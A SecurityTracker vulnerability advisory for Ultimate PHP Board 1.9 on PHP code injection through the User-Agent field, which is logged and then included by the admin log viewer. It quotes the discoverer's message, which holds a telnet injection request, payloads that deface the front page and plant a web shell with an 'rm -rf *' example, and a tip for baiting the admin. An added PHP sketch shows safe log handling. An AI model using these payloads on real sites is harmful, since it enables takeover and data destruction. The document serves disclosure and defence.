SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Ultimate PHP Board
Vendors:   Hoeppner, Tim
Ultimate PHP Board Input Validation Flaw in 'iplog' File Lets Remote Users Cause Arbitrary PHP Code to Be Executed on the System
SecurityTracker Alert ID:  1006841
SecurityTracker URL:  http://securitytracker.com/id/1006841
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 24 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.9
Description:   A vulnerability was reported in Ultimate PHP Board (UPB). A remote user can cause arbitrary PHP code to be executed on the system by the UPB administrator.

F0KP reported that a remote user can cause PHP code to be logged by the system and can then cause that code to be executed by the UPB administrator. According to the report, the application logs the contents of the user-supplied HTTP_USER_AGENT field to the 'iplog' text file in the 'db' directory. If the remote user inserts PHP code into the user agent field and the administrator then views the log file with the 'admin_iplog.php' script, the inserted PHP code will be executed on the target server.

A demonstration exploit transcript is provided:

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

Some additional demonstration exploit commands are provided in the Source Message.

Impact:   A remote user can cause arbitrary PHP code to be written to a log file so that, when the administrator views the log file, the arbitrary code will be executed on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myupb.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
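
The flaw comes from passing a log that holds attacker-controlled text through the PHP parser instead of reading it as data. The sketch below is an added example, not UPB's code or a vendor fix: it shows a write/read pair that keeps the log inert. The function names `log_visit` and `render_log`, the tab-separated line format and the sample addresses are assumptions.

```php
<?php
// Added example: hypothetical helpers, not UPB's own code.
// Assumption: the log is a flat text file with one visitor entry per line.

// Pattern described in the advisory: the viewer include()s the log file, so a
// PHP open tag that arrived in User-Agent is parsed and run.
//   include 'db/iplog';

// Write side: collapse control bytes (CR, LF, TAB, NUL) so one request is
// exactly one line and a visitor cannot forge extra entries or fields.
function log_visit(string $logFile, string $ip, string $userAgent): void
{
    $clean = static function (string $v): string {
        $v = (string) preg_replace('/[\x00-\x1F\x7F]+/', ' ', $v);
        return substr($v, 0, 512); // bound the stored length
    };
    $line = sprintf("%s\t%s\t%s\n", date('c'), $clean($ip), $clean($userAgent));
    file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX);
}

// Read side: treat the log strictly as data. file() never invokes the PHP
// parser, and htmlspecialchars() keeps logged markup from being interpreted
// by the administrator's browser either.
function render_log(string $logFile): string
{
    $lines = is_readable($logFile)
        ? (file($logFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [])
        : [];
    $html = "<pre>\n";
    foreach ($lines as $line) {
        $html .= htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "\n";
    }
    return $html . "</pre>\n";
}

// Constructed demo input: a harmless marker stands in for injected code.
$log = tempnam(sys_get_temp_dir(), 'iplog');
log_visit($log, '192.0.2.10', 'Mozilla/4.0 (compatible)');
log_visit($log, '192.0.2.66', "<? echo 'INJECTED'; ?>\r\nfake\tentry");
echo render_log($log); // the tag is shown as escaped text and never runs
unlink($log);
```

Keeping the log outside the web root, or denying direct HTTP access to the 'db' directory, is a complementary control: it does not replace reading the file as data in the viewer.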


 Source Message Contents

Subject:  UPB: Discussion Board/Web-Site Takeover


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
               http://f0kp.iplus.ru/bz/024.ru.txt 
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=


description
-----------

there is a serious vuln that allows an attacker to execute random php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and
HTTP_USER_AGENT ] in a text file under the `db' directory named `iplog'.
then in the admin panel the board admin can call admin_iplog.php, which
just includes `iplog'. That's 0k, but..

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

when the admin calls admin_iplog.php your php code will be executed.

examples for kodsweb skids:

1. <? system( "echo \'hacked\' > ../index.html" ); ?>

will deface forum main page

2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>

will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *

after injecting code through the User-Agent field you have to wait for the
admin to see admin_iplog.php. how to make the admin see the iplog?? it's quite
easy == just annoy the admin, use swearing in board messages, etc.


bonus
-----

in http://www.securityfocus.com/archive/1/302459 i just wrote
about some vulns in prior versions of UPB. and i wanna say that
some of the described vulns still exist in 1.9!!

have a nice day >:E


shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!
          

================
im not a lame,
not yet a hacker
================

 
 



Copyright 2020, SecurityGlobal.net LLC